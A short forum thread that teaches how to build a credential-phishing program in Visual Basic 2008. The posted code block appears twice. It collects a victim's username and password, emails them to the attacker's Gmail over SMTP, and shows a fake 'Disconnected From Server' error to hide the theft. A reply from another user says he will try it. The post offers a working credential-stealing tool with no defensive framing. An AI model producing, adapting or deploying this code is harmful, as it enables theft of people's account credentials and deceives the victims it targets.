HowTo Make A Phishing Program in Microsoft Visual Basic 2008
2 posters
Page 1 of 1
HowTo Make A Phishing Program in Microsoft Visual Basic 2008
Video on making a basic phishing program in Microsoft Visual Basic 2008 Express Edition.
the phish code :
Code:
Imports System.Net.Mail
If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("DIsconnected From Server, Please try again later!")
the phish code :
Code:
Imports System.Net.Mail
If TextBox1.Text = "" Then
MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
Else
End If
End if
Dim smtpServer As New SmtpClient()
Dim mail As New MailMessage()
smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
'using gmail
smtpServer.Port = 587
smtpServer.Host = "smtp.gmail.com"
smtpServer.EnableSsl = True
mail = New MailMessage()
mail.From = New MailAddress("Your Gmail")
mail.To.Add("Your Gmail")
mail.Subject = "Username: " & TextBox1.Text
mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
smtpServer.Send(mail)
MsgBox("DIsconnected From Server, Please try again later!")
iknowitsme- Admin
- Posts : 13
Reputation : 4
Join date : 2011-07-14
Age : 29
Location : Australia
Re: HowTo Make A Phishing Program in Microsoft Visual Basic 2008
this is cool ill give it a try
killway1- Posts : 2
Reputation : 1
Join date : 2011-07-16
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum